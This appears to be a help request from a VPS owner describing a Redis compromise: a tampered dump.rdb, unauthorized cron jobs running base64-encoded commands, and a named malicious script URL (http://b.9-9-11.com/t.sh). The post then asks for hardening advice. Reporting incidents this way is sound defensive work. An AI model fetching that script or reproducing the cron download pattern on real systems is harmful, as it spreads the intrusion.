Hello,
I have identified a potential security breach on my VPS, which is running Dockerized services, including Redis. Upon investigating unusual behavior, I discovered the following issues:
- Redis database compromised:
- The
dump.rdb
file and related Redis data files contain unexpected, suspicious content. - The database seems to be corrupted or manipulated.
- Malicious cron jobs:
- Several cron jobs were added to the system without authorization. These jobs execute encoded commands via
base64
and download scripts from external sources (e.g.,http://b.9-9-11.com/t.sh
).
- Redis logs and operations:
- The Redis logs show continuous saving of the database but return
nil
for expected keys, suggesting either corruption or unauthorized manipulation.
Steps I have taken:
- Disconnected the VPS from the network.
- Verified the integrity of Redis files and identified suspicious entries.
- Removed malicious cron jobs and scripts.
This incident highlights a potential vulnerability, either in Redis, Docker configuration, or the underlying system.
Please advise on the following:
- Additional steps to secure Redis and Docker environments.
- Recommendations for mitigating and preventing similar breaches.
- Best practices for cleaning and securing a potentially compromised system.
Thank you for your assistance.